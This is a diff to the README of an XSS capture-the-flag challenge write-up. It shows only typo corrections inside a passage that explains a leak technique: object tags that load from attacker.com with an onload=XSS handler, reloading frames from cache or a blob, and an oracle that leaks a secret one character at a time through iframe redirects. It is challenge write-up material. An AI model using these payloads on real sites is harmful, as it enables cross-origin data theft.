terjanq/Easter-xss-challenge/README.md

 <object name=poc data=//attacker.com/poc.html></object>
 <object name=xss src=//attacker.com/empty.html onload=XSS></object>
 ```
-and instead of calling `location.reload()` we could call`top.xss.location='//attacker.com/empty.html'` to load a resource from the borwser cache very efficently, or even better, load an empty blob which also has the origin `attacker.com`:
+and instead of calling `location.reload()` we could call`top.xss.location='//attacker.com/empty.html'` to load a resource from the browser cache very efficently, or even better, load an empty blob which also has the origin `attacker.com`:
 ```js
 top.xss.location = URL.createObjectURL(new Blob([], { type: 'text/html'}));
 ```
-The above technique should trigger `onload` event almost instantly.
+The above technique should trigger the `onload` event almost instantly.

 ## More iframes
 Instead of only using `true` and `false` iframes, we could use 36 iframes, each corresponding to a different character in its name, e.g. `i_[character]`.
 Then calling `top.poc.i_t.location++` leaks the information about the character `t` via redirecting a specific iframe.
-To make it work we need to tweak oracle a little bit and use tenary tricks to perform 36 checks.
+To make it work we need to tweak the oracle a little bit and use ternary tricks to perform 36 checks.
 Let's see how this could be done.

 ```js
 /##/.source + identifier < location.hash + /0/.source && !top.x.i_0.location++ && t.j,